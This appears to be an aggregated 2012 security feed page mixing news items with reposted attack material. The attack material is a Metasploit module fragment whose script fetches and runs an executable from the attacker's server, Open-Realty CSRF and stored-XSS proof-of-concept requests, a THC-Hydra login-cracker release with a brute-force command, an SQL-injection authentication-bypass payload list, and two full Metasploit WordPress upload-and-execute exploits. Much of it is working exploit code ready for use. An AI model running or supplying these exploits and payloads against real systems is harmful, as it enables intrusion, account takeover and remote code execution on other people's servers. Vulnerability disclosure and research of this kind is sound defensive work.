rescue ::Rex::Post::Meterpreter::RequestError
print_error("Failed to delete #{win_file}")
false
end
end
end
end
def on_request_uri(cli, request)
if request.uri =~ /\.exe$/
return if ((p=regenerate_payload(cli))==nil)
register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}")
register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}")
data = generate_payload_exe({:code=>p.encoded})
print_status("Sending payload")
send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
return
end
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
if datastore['SSL']
schema = "https"
else
schema = "http"
end
uri = "#{schema}://#{my_host}"
uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe"
script = "var w=new ActiveXObject('wscript.shell');"
script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"
script << "var x=new ActiveXObject('Microsoft.XMLHTTP');"
script << "x.open('GET','#{uri}', false);"
script << "x.send();"
script << "var s=new ActiveXObject('ADODB.Stream');"
script << "s.Mode=3;"
script << "s.Type=1;"
script << "s.Open();"
script << "s.Write(x.responseBody);"
script << "s.SaveToFile('#{@exe_name}',2);"
script << "w.Run('#{@exe_name}');"
vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM"
link_id = rand_text_alpha(5 + rand(5))
js_click_link = %Q|
function clickLink(link) {
var cancelled = false;
if (document.createEvent) {
var event = document.createEvent("MouseEvents");
event.initMouseEvent("click", true, true, window,
0, 0, 0, 0, 0,
false, false, false, false,
0, null);
cancelled = !link.dispatchEvent(event);
}
else if (link.fireEvent) {
cancelled = !link.fireEvent("onclick");
}
if (!cancelled) {
window.location = link.href;
}
}
|
if datastore['OBFUSCATE']
js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
js_click_link.obfuscate
js_click_link_fn = js_click_link.sym('clickLink')
else
js_click_link_fn = 'clickLink'
end
html = <<-EOS
<html>
<head>
<script>
#{js_click_link}
</script>
</head>
<body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">
<a id="#{link_id}" href="notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\windows\\system32\\cmd.exe -vmargs #{vmargs}"></a>
</body>
</html>
EOS
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
↧
Top 10 IT security stories of 2012
nterprise IT security professionals faced increasingly sophisticated, stealthy and dynamic threats in 2012, but numerous surveys revealed that knowledge and understanding of the latest attack techniques are lacking in many organisations. Similarly, user security awareness has been a recurrent theme.
The past year saw an increase in the cost of data breaches, as well as a growing number of attacks targeting new technologies such as virtualisation, new communication channels such as social networking and new mobile devices.
Continued budget constraints have also prompted a growing number of calls for greater alignment between IT security and the business.
Here are 10 articles that illustrate some of the key challenges and strategies around information security for governments, businesses and individuals.
IT security workers must support business needs, says Ernst & Young
IT security professionals need to transform the profession if they are to persuade business they are doing a good job, according to Mark Brown, director of information security at Ernst & Young. “Most organisations think information security professionals are not fulfilling the needs of business,” Brown told attendees of the Govnet Cyber Security Summit 2012 in London.
Evasion threat to critical systems goes ignored, says Stonesoft
Many organisations continue to rely on ineffective intrusion prevention systems (IPS) for defending information systems, says security firm Stonesoft. Advanced evasion techniques (AETs) – which combine several known evasion methodologies to create new and dynamically changing techniques – bypass most IPSs on the market, tests have shown.
UK organisations fail to address social networking risk
Unguarded corporate social media accounts are leaving companies exposed to serious security breaches, a survey of more than 1,000 senior UK executives revealed. Most respondents (87%) said they use social media strategies to enhance their business, but 45% said they had experienced a security scare as a direct result in the past year, according to the survey by OnePoll on behalf of KPMG.
read more.....http://www.computerweekly.com/news/2240174302/Top-10-IT-security-stories-of-2012?goback=%2Egmp_38412%2Egde_38412_member_198929766
↧
Open-Realty CMS 3.x Cross Site Request Forgery (CSRF) Vulnerability
1. OVERVIEW
Open-Realty CMS 3.x versions are vulnerable to Cross Site Request Forgery.
2. BACKGROUND
Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.
3. VULNERABILITY DESCRIPTION
Open-Realty 3.x versions contain a flaw that allows a remote
Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists
because the application does not require multiple steps or explicit
confirmation for sensitive transactions for majority of administrator
functions such as adding new user, assigning user to administrative
privilege. By using a crafted URL, an attacker may trick the victim
into visiting to his web page to take advantage of the trust
relationship between the authenticated victim and the application.
Such an attack could trick the victim into executing arbitrary
commands in the context of their session with the application, without
further prompting or verification.
4. VERSIONS AFFECTED
3.x
5. PROOF-OF-CONCEPT/EXPLOIT
<!-- Change Password -->
<form action="http://127.0.0.1/admin/ajax.php?action=ajax_update_user_data";
method="POST">
<input type="hidden" name="user_id" value="2" />
<input type="hidden" name="user_first_name" value="Well" />
<input type="hidden" name="user_last_name" value="Smith" />
<input type="hidden" name="user_email" value="hacker@yehg.net" />
<input type="hidden" name="phone" value="123456789" />
<input type="hidden" name="mobile" value="9151403793" />
<input type="hidden" name="fax" value="" />
<input type="hidden" name="homepage" value="http://yehg.net" />
<input type="hidden" name="info" value="test" />
<input type="hidden" name="edit_user_pass" value="agent" />
<input type="hidden" name="edit_user_pass2" value="agent" />
<input type="submit" value="Submit form" />
</form>
<script>
document.forms[0].submit();
</script>
6. SOLUTION
The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.
7. VENDOR
Transparent Technologies Inc.
http://www.transparent-support.com
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_3.x%5D_csrf
Open-Realty Home Page: http://www.open-realty.org/
#yehg [2012-12-25]
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
Open-Realty CMS 3.x Persistent Cross Site Scripting (XSS) Vulnerability
1. OVERVIEW
Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site
Scripting (XSS).
2. BACKGROUND
Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.
3. VULNERABILITY DESCRIPTION
Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
4. VERSIONS AFFECTED
3.x
5. PROOF-OF-CONCEPT/EXPLOIT
/admin/ajax.php (parameter: title, full_desc, ta)
///////////////////////////////////////////////////////
POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1
Host: localhost
Content-Length: 574
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;
edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&seotitle=test-7002&edit_active=yes&mlsexport=no&or_owner=2¬es=66&address=aaa&city=aaa&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&home_features%5B%5D=&community_features%5B%5D=&openhousedate=
///////////////////////////////////////////////////////
POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 112
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/admin/index.php?action=edit_blog_post&id=65
Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;
blogID=65&title=about+us&ta='"><script>alert('Error')</script>&description=&keywords=&status=1&seotitle=about-us
///////////////////////////////////////////////////////
6. SOLUTION
The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.
7. VENDOR
Transparent Technologies Inc.
http://www.transparent-support.com
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss
Open-Realty Home Page: http://www.open-realty.org/
#yehg [2012-12-25]
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
Developers of FlowTraq to Present a Breakout Session – “Identifying Network Users Using Flow-Based Behavioral Fingerprinting” – at FloCon 2013
ProQSys, provider of scalable network security software for enterprise environments, announces Alexander Barsamian, FlowTraq R&D lead, will present a breakout discussion and NetFlow-based demonstration on identifying network users using flow-based behavioral fingerprinting at FloCon 2013 (January 7-10, 2013, Albuquerque, New Mexico). He will present on Wednesday, January 9, 2013, 1:30-2:00 p.m.
At FloCon 2013, FlowTraq will share how individuals’ unique patterns of behavior related to tasks and interests can aid in network security.
(PRWEB)
ProQSys, provider of scalable network security software for enterprise environments, today announces Alexander Barsamian, FlowTraq R&D lead, will present a breakout discussion and NetFlow-based demonstration on identifying network users using flow-based behavioral fingerprinting at FloCon 2013 (January 7-10, 2013, Albuquerque, New Mexico). He will present on Wednesday, January 9, 2013, 1:30-2:00 p.m.
FloCon 2013 is a network security conference that provides a forum for operational network analysts, tool developers, researchers, and other parties interested in the analysis of large volumes of traffic to display the next generation of flow-based analysis techniques. This year's conference will focus on the challenges of "Analysis at Scale." In large network environments, flow (an abstraction of network traffic in which packets are aggregated by common attributes over time) data helps to provide a scalable way of seeing the big picture, as well as a streamlined platform for highlighting patterns of malicious behavior over time.
FlowTraq is a network security software product that uses network flow records to provide unified security, monitoring, and forensics. Barsamian will provide attendees of the breakout session and demonstration a greater understanding of flow-based behavior fingerprinting. Having developed the only commercially available solution that scales beyond 100Gbps without the need to sample or aggregate data, Barsamian will share insights on:
What a user fingerprint is and how individuals’ unique patterns of behavior related to tasks and interests can aid in network security improvements
How to make active, adaptive fingerprinting available to network administrators, including a review of data and processing requirements, and ease of implementation (technology- and policy-related)
What makes NetFlow’s properties – privacy, speed, and scalability – attractive to analysts
The methodologies and parameters for implementing and compiling flow-based behavioral fingerprinting
The anticipated short-term and long-term gains from implementing NetFlow-based fingerprinting
About the Presenter
Alexander (Alex) Barsamian, FlowTraq R&D lead – Barsamian is a software developer and project leader at FlowTraq. He has been involved in network security and flow research efforts since 2001, first at Institute for Security Technology Studies (ISTS) at Dartmouth College, subsequently as a graduate student, and currently at FlowTraq. His research has included flow-based methods for host characterization, anomaly detection, and botnet recognition; he has also worked on software compartmentalization and attestation, and on process query systems. Barsamian earned a B.A. in Computer Science with a minor in mathematics, and an M.S. in engineering, both from Dartmouth College.
About FlowTraq by ProQSys
FlowTraq is a network security software product that uses network flow records to provide unified security, monitoring, and forensics. It is the only commercially available solution that scales beyond 100Gbps without the need to sample or aggregate data. As a result, FlowTraq's robust behavioral fingerprints trigger few false alarms, which mean less time lost investigating non-incidents. FlowTraq can be deployed stand-alone or in a cluster, enabling it to offer its forensically accurate analytics at any bandwidth level. It is designed to complement and improve existing network security operations.
Founded in 2004, ProQSys develops and markets software solutions that monitor and analyze network security and performance to provide deep insight, high visibility, and valuable understanding of complex network infrastructures. With FlowTraq, users gain an unprecedented level of network situational awareness that facilitates fast and easy monitoring, quick security analysis, and complete forensic recall of any traffic that crosses their network, thus reducing organizational risk. ProQSys software solutions include FlowTraq, FlowTraq Lite, Flow Exporter, and InterMapper Flows. ProQSys has over 2,600 customers worldwide, including Fortune 500 companies, ISPs, Managed Service Providers, government, schools, and universities. ProQSys is privately held and headquartered in New Hampshire. For more information, visit http://www.flowtraq.com/corporate/.
↧
↧
(Inclusive Funny Old School Short XMAS RAP) A year on the run: El Reg tracks 2012’s techno-fugitives Svartholm, Dotcom, McAfee, Assange … Whitman and Ballmer?
Whoever thought 2012 would be boring without Steve Jobs has been proven wrong ... Tech industry scandal-watchers have been blessed with colourful antics from the likes of Kim Dotcom, Larry Ellison, Julian Assange and more... Meanwhile, a supporting case of folk like Eugene Kaspersky and Mike Lynch are also fun to watch.
In 2012, most of the gossip has been dominated by a preponderance of IT folk on the run. And we don't mean Meg Whitman and Steve Ballmer, despite increasingly fevered pursuit by shareholders.
We’re more interested in Gottfrid Svartholm, Julian Assange, Kim Dotcom and John McAfee, who gave the IT community the spectacle of dawn raids, embassy dashes, arrests in exotic locales and jungle border crossings.
The first name on the list above, Svartholm, is a co-founder of The Pirate Bay and disappeared in September 2010, when it was thought he was in Cambodia.
That's where he was found and arrested in September. He's now in Sweden, fending off hacking charges. In early December he emerged from a spell in solitary confinement. Whether his time in the hole counts towards the one-year sentence he is due to serve for Pirate-Bay-related naughtiness isn't yet known, but it seems a safe bet to predict Swartholm's 2013 won't be an awful lot of fun.
read more..........http://www.theregister.co.uk/2012/12/25/2012_fugitives/
and old Christmas Rap https://www.youtube.com/watch?v=fh8hB1tAip8
↧
THC-Hydra 7.4.1 logon cracker New Release
 |
|
[0x00] News and Changelog
Check out the feature sets and services coverage page - including a speed comparison against ncrack and medusa (yes, we win :-) )
Read below for Linux compilation notes.
And there is a new section below for online tutorials.
CHANGELOG for 7.4.1
===================
* Quickfix to compile for people who do not have libssh installed
CHANGELOG for 7.4
-----------------
* New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!)
* Added support for win8 and win2012 server to the RDP module
* Better target distribution if -M is used
* Added colored output (needs libcurses)
* Better library detection for current Cygwin and OS X
* Fixed the -W option
* Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested
* Fixed HTTP Form module false positive when no answer was received from the server
* Fixed SMB module return code for invalid hours logon and LM auth disabled
* Fixed http-{get|post-form} from xhydra
* Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz)
* Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-)
* Added debug mode option to usage (thanks to Anold Black)
You can also take a look at the full CHANGES file
[0x01] Introduction
Welcome to the mini website of the THC Hydra project.
Number one of the biggest security holes are passwords, as every password security study shows.
Hydra is a parallized login cracker which supports numerous protocols to attack. New modules
are easy to add, beside that, it is flexible and very fast.
Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and
is made available under GPLv3 with a special OpenSSL license expansion.
Currently this tool supports:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST,
HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle,
PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum,
SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.
This tool is a proof of concept code, to give researchers and security consultants the
possiblity to show how easy it would be to gain unauthorized access from remote to a system.
The program is maintained by van Hauser and David Maciejak.
[0x02] Documentation
Hydra comes with a rather long README file that describes the
details about the usage and special options.
But sometimes detailed online help can vastly improve your efficency.
The following links on the global internet are a recommended read.
General usage and options: http://www.aldeid.com/wiki/Thc-hydra
HTTP basic auth: https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
http://www.sillychicken.co.nz/Security/how-to-brute-force-your-router-in-windows.html
HTTP form based auth: http://www.art0.org/security/performing-a-dictionary-attack-on-an-http-login-form-using-hydra
http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html
http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html
https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
Multiple protocols: http://wiki.bywire.org/Hydra
http://www.attackvector.org/brute-force-with-thc-hydra/
http://www.madirish.net/content/hydra-brute-force-utility
Telnet: http://www.theprohack.com/2009/04/basics-of-cracking-ftp-and-telnet.html
http://www.adeptus-mechanicus.com/codex/bflog/bflog.html
For those people testing with DVWA, this is what you want:
hydra -l admin -p passwordhttp-get-form "/dvwa/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed"
If you find other good ones, just email them in ( vh(at)thc(dot)org ).
[0x03] Compilation Help
Hydry compiles fine on all platforms that have gcc - Linux, all BSD, Mac OS/X, Cygwin on Windows, Solaris, etc.
It should even compile on historical SunOS, Ultrix etc. platforms :-)
There are many optional modules for network protocols like SSH, SVN etc. that require libraries.
If they are not found, these optional libraries will not be supported in your binary.
If you are on Linux, the following commands install all necessary libraries:
Ubuntu/Debian: apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev
Redhat/Fedora: yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
OpenSuSE: zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel
This enables all optional modules and features with the exception of Oracle, SAP R/3 and the
Apple filing protocol - which you will need to download and install from the vendor's web sites.
For all other Linux derivates and BSD based systems, use the system software installer and look for
similar named libraries like in the command above.
In all other cases you have to download all source libraries and compile them manually;
the configure script output tells you what is missing and where to get it from.
[0x04] Disclaimer
1. This tool is for legal purposes only!
2. The GPLv3 applies to this code.
3. A special license expansion for OpenSSL is included which is required for the debian people
[0x05] Development & Contributions
Your contributions are more than welcomed!
If you find bugs, coded enhancements or wrote a new attack module for a service,
please send them to vh (at) thc (dot) org
Interesting attack modules would be:
OSPF, BGP, PIM, PPTP, ...
(or anything else you might be able to do (and is not there yet))
[0x06] Screenshots
(1) Target selection
(2) Login/Password setup
(3) Hydra start and output
[0x07] The Art of Downloading: Source and Binaries
1. The source code of state-of-the-art Hydra: hydra-7.4.1.tar.gz
(compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux, etc.)
2. The source code of the stable tree of Hydra ONLY in case v7 gives you problems on unusual and old platforms:
hydra-5.9.1-src.tar.gz
3. The Win32/Cywin binary release: --- not anymore ---
Install cygwin from http://www.cygwin.com
and compile it yourself. If you do not have cygwin installed - how
do you think you will do proper securiy testing? duh ...
4. ARM and Palm binaries here are old and not longer maintained:
ARM: hydra-5.0-arm.tar.gz
Palm: hydra-4.6-palm.zip
Comments and suggestions are welcome.
Yours sincerly,
van Hauser
The Hackers Choice
http://www.thc.org/thc-hydra
↧
SQLi Authentication Bypass Short List
This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
↧
Metasploit: WordPress Asset-Manager PHP File Upload Vulnerability
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/php_exe'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
plugin. By abusing the upload.php file, a malicious user can upload a file to a
temp directory without authentication, which results in arbitrary code execution.
},
'Author' =>
[
'Sammy FORGIT', # initial discovery
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '82653' ],
[ 'BID', '53809' ],
[ 'EDB', '18993' ],
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 26 2012'))
register_options(
[
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
], self.class)
end
def exploit
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self=>true)
data = Rex::MIME::Message.new
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Uploading payload #{payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res or res.code != 200 or res.body !~ /#{payload_name}/
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload #{payload_name}")
res = send_request_raw({
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
'method' => 'GET'
})
if res and res.code != 200
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
end
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
↧
Metasploit: WordPress WP-Property PHP File Upload Vulnerability
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/php_exe'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
temp directory without authentication, which results in arbitrary code execution.
},
'Author' =>
[
'Sammy FORGIT', # initial discovery
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '82656' ],
[ 'BID', '53787' ],
[ 'EDB', '18987'],
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 26 2012'))
register_options(
[
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
], self.class)
end
def check
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
})
if not res or res.code != 200
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Appears
end
def exploit
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
@payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self=>true)
data = Rex::MIME::Message.new
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
upload_uri = res.body
print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_raw({
'uri' => upload_uri,
'method' => 'GET'
})
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
Video: TOP TEN WEB DEFENSES
Description: Abstract
We cannot hack or firewall our way secure. Application programmers need to learn to code in a secure fashion if we have any chance of providing organizations with proper defenses in the current threatscape. This talk will discuss the 10 most important security-centric computer programming techniques necessary to build low-risk web-based applications.
The best security is contextual to each organization, application and feature. Real-world tradeoffs will be discussed in detail for each "control" and "control category" discussed.
*****
Speaker
Jim Manico, VP Security Architecture, WhiteHat Security
Jim Manico is the VP of Security Architecture for WhiteHat Security. He is the founder, producer and host of the OWASP Podcast Series, as well as the committee chair for the OWASP Connections Committee. He is the project manager of the OWASP Cheatsheet series, and a significant contributor to several other OWASP projects. Jim provides secure coding and developer awareness training for WhiteHat Security using his 8+ years of experience delivering developer-training courses for SANS, Aspect Secur…
Source link: http://vimeo.com/54130346
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
Govt draws up plan to revamp cyber security of critical sectors
NEW DELHI: In its bid to meet the challenge of ever increasing cyber attacks and security in the virtual world, the government has set in motion a five-year project to revamp the entire cyber security apparatus of critical sectors in the country. In the past one year, India has suffered 13,000 cyber incidents.
The responsibility for the job has been vested in National Critical Information Infrastructure Protection Centre (NCIIPC), the nodal agency to coordinate cyber security operations for critical infrastructures across the country. NCIIPC has prepared a five-year plan to completely revamp and integrate the cyber security apparatus of all critical infrastructure such as power, transportation, water, telecommunication and defence.
The agency, which is soon to be notified, further plans to set up sectoral Computer Emergency Response Teams (CERTs) that will be connected to it. It will install sensors on all critical systems to give real-time information to its command and control centre about any cyber attack to formulate quick response.
read more..........http://timesofindia.indiatimes.com/india/Govt-draws-up-plan-to-revamp-cyber-security-of-critical-sectors/articleshow/17749665.cms?utm_source=twitterfeed&utm_medium=twitter
↧